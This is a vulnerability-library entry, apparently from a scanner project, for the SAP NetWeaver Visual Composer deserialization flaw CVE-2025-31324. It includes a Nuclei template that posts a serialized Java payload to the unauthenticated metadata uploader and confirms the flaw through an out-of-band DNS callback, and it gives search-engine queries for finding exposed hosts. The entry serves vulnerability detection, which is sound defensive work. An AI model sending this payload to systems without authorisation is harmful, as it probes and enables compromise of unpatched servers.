/Vulnerability Library

SAP NetWeaver Visual Composer Metadata Uploader - Deserialization

CVE-2025-31324
Verified

Description

SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.

Severity

Critical

CVSS Score

10

Exploit Probability

80%

Affected Product

netweaver

Published Date

April 26, 2025

Template Author

iamnoooob, rootxharsh, parthmalhotra
+1

CVE-2025-31324.yaml
id: CVE-2025-31324

info:
  name: SAP NetWeaver Visual Composer Metadata Uploader - Deserialization
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
  reference:
    - https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/
    - https://www.theregister.com/2025/04/25/sap_netweaver_patch/
    - https://me.sap.com/notes/3594142
    - https://url.sap/sapsecuritypatchday
    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-31324
    cwe-id: CWE-434
    epss-score: 0.79541
    epss-percentile: 0.9902
    cpe: cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sap
    product: netweaver
    shodan-query:
      - http.html:"sap netweaver application server java"
      - cpe:"cpe:2.3:a:sap:netweaver"
      - http.favicon.hash:"-266008933"
    fofa-query: icon_hash=-266008933
  tags: cve,cve2025,sap,netweaver,rce,deserialization,kev
variables:
  oast: ".{{interactsh-url}}"
  payload: "{{padding(oast,'a',54,'prefix')}}"


http:
  - raw:
      - |
        POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data

        {{zip('.properties',replace(base64_decode('rO0ABXNyABRqYXZhLnV0aWwuUHJvcGVydGllczkS0HpwNj6YAgABTAAIZGVmYXVsdHN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHIAE2phdmEudXRpbC5IYXNodGFibGUTuw8lIUrkuAMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAADdwgAAAAFAAAAAnQADnByb2plY3QtbmF0dXJlc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAADHcIAAAAEAAAAAFzcgAMamF2YS5uZXQuVVJMliU3Nhr85HIDAAdJAAhoYXNoQ29kZUkABHBvcnRMAAlhdXRob3JpdHl0ABJMamF2YS9sYW5nL1N0cmluZztMAARmaWxlcQB+AAhMAARob3N0cQB+AAhMAAhwcm90b2NvbHEAfgAITAADcmVmcQB+AAh4cP//////////dAA2YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhdAAAcQB+AAp0AARodHRwcHh0AD1odHRwOi8vYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFheHQAC0VYUE9SVC1OQU1FdAATc29tZV9wcm9qZWN0X25hbWV4eHhw'),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',payload))}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains_all(body, 'FAILED', 'Cause')
        condition: and
# digest: 4a0a00473045022100bb9f6187bac7018fe7efac0fe3ad28d02d78c3bc081fdf3b4d0015884c19751d02207c098d8aba46520a4d6726de2e2fe8ecf4e32cbe356e2cae207c9c9d61390b85:922c64590222798bb761d5b6d8e72950
10.0Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-31324
CWE ID:
cwe-434